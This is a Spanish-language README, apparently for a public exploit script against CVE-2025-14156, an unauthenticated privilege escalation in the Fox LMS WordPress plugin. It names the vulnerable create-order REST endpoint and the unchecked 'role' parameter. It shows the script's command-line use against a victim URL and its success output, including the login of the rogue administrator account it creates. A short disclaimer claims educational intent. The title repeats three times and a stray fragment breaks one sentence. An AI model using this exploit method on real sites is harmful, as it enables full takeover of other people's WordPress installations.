
Fox LMS – WordPress LMS Plugin 1.0.4.7 - 1.0.5.1 - Escalada de privilegios no autenticada a través de 'createOrder'
Fox LMS – Plugin LMS para WordPress 1.0.4.7 - 1.0.5.1 - Escalada de Privilegios no Autenticada mediante 'createOrder'
Fox LMS – Plugin LMS para WordPress (v1.0.4.7 a v1.0.5.1) – Escalada de Privilegios no Autenticada mediante createOrder
Todas las versiones hasta la 1.0.5.1 inclusive de Fox LMS para WordPress son vulnerables a escalada de privilegios. El endpoint de la API REST /fox-lms/v1/payments/create-order no valida correctamente el parámetro 'role' al crear nuevos usuarios, lo que permite a atacantes no autenticados crear cuentas con roles arbitrarios, incluido Administrador.
CVE: CVE-2025-14156
Puntuación CVSS: 9.8 (Crítica)
Riesgo: Compromiso completo del sitio.
CVE-2025-14156.py
python CVE-2025-14156.py -help
usage: CVE-2025-14156.py [-h] -u URL
CVE-2025-14156 Exploit By: Nxploited | Telegram: @Nxploited | Github: Nxploited
options:
-h, --help show this help message and exit
-u, --url URL Target URL (e.g. https://victim.site)
python CVE-2025-14156.py -u https://victim.site
Tras una explotación exitosa, el script mostrará únicamente:
[+] Exploit Successful!
Username: nxploited
Password: Nxploited@2025Strong
Si la explotación falla, solo se mostrará un mensaje de error conciso.
'administrator'.Esta herramienta es solo para fines educativos y de pruebas autorizadas. Cualquier uso no autorizado contra sistemas sin permiso explícito es ilegal. El autor no se responsabiliza por el mal uso, daños o consecuencias legales derivadas del uso de este script. Siga siempre las prácticas de divulgación responsable y asegúrese de tener autorización por escrito antes de probar cualquier objetivo.
Telegram: @Nxploited
Github: Nxploited